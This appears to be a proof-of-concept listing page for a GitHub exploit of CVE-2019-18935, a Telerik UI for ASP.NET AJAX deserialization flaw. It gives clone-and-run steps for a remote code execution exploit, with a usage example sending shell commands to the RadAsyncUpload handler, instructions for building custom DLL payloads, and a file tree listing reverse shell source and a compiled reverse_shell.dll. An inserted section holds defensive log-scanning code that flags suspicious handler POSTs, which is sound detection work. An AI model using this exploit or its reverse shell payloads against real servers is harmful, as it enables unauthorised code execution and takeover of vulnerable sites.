CVE-2019-18935 PoC — Progress Telerik UI for ASP.NET AJAX Code Issue Vulnerability

Source
Associated Vulnerability
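Title: Progress Telerik UI for ASP.NET AJAX Code Issue Vulnerability (CVE-2019-18935)
Description: Progress Telerik UI for ASP.NET AJAX is an HTML editor. The 'RadAsyncUpload' function in Progress Telerik UI for ASP.NET AJAX 2019.3.1023 and earlier contains a code issue vulnerability. A remote attacker can exploit this vulnerability with a specially crafted request to execute arbitrary code in the context of the w3wp.exe process.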
Description
Exploit for CVE-2019-18935
Readme
# CVE-2019-18935 Exploit

Remote code execution exploit for Telerik UI for ASP.NET AJAX through a deserialization vulnerability.

## How to Run

### Step 1: Clone the Project
```bash
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
```

### Step 2: In `CVE-2019-18935.py`, modify line 15:

```python
version = "2017.1.228"  # Replace with target server's Telerik version
```

### Step 3: Run the Exploit

```bash
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
```
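
The request in Step 3 goes to the `Telerik.Web.UI.WebResource.axd?type=rau` handler, so it is visible in IIS logs. The following is an added example, not part of the original README or repository: it scans a W3C-format log for POSTs to that handler and checks a version string against the 2019.3.1023 bound from the description above. The sample log lines, field layout and function names are constructed assumptions.

```python
"""Flag RadAsyncUpload handler POSTs in an IIS W3C log and check version exposure."""
from collections import Counter

HANDLER = "/telerik.web.ui.webresource.axd"
LAST_AFFECTED = (2019, 3, 1023)  # bound taken from the description on this page

# Constructed sample log, not real traffic (addresses are documentation ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-10 09:00:01 GET /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2024-01-10 09:00:05 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
2024-01-10 09:00:09 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 500
2024-01-10 09:01:00 GET /default.aspx - 203.0.113.20 200
2024-01-10 09:02:00 POST /app/Telerik.Web.UI.WebResource.axd _TSM=1&type=rau 203.0.113.20 200
"""

def is_affected(version: str) -> bool:
    """True if the version is at or below 2019.3.1023 (a 4th build part is ignored)."""
    return tuple(int(p) for p in version.split(".")[:3]) <= LAST_AFFECTED

def rau_posts(log_text: str):
    """Return (date, time, client_ip, status) for each POST to the handler with type=rau."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        params = row.get("cs-uri-query", "").lower().split("&")
        if row.get("cs-method") == "POST" and stem.endswith(HANDLER) and "type=rau" in params:
            hits.append((row["date"], row["time"], row["c-ip"], row["sc-status"]))
    return hits

def by_client(hits):
    """Count flagged requests per client IP to prioritise triage."""
    return Counter(ip for _, _, ip, _ in hits)

if __name__ == "__main__":
    found = rau_posts(SAMPLE_LOG)
    for hit in found:
        print(*hit)
    print(dict(by_client(found)))
    print("2017.1.228 affected:", is_affected("2017.1.228"))
```

Sites that use RadAsyncUpload legitimately also POST to this handler, so hits are leads for triage rather than verdicts.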

🔧 **Building Custom DLL Files**

To create a DLL from a different C file (not just reverse shell):

Install Visual Studio (Desktop development with C++) with these components:

- MSVC v143 - VS 2022 C++ x64/x86 build tools
- Windows 11 SDK
- C++ CMake tools for Windows
- C++ AddressSanitizer

Build the DLL:

```bash
build-dll.bat your_file.c
```

The DLL will be created in the `payloads/` directory.

📋 **File Descriptions**

```
CVE-2019-18935_exploit/
├── CVE-2019-18935.py        # Main exploit code
├── RAU_crypto.py            # Telerik encryption/decryption module
├── build-dll.bat            # Script to build DLL files from C code
├── reverse_shell.c          # C source code for reverse shell
└── payloads/                # Directory for compiled DLL payload files
```

---
File Snapshot

```
[4.0K] /data/pocs/c1d949f059b352f00033ed7f56af9a5a28563fe9
├── [1.9K] build-dll.bat
├── [4.9K] CVE-2019-18935.py
├── [4.0K] payloads
│   └── [110K] reverse_shell.dll
├── [ 14K] RAU_crypto.py
├── [1.4K] README.md
└── [1.6K] reverse-shell.c

2 directories, 6 files
```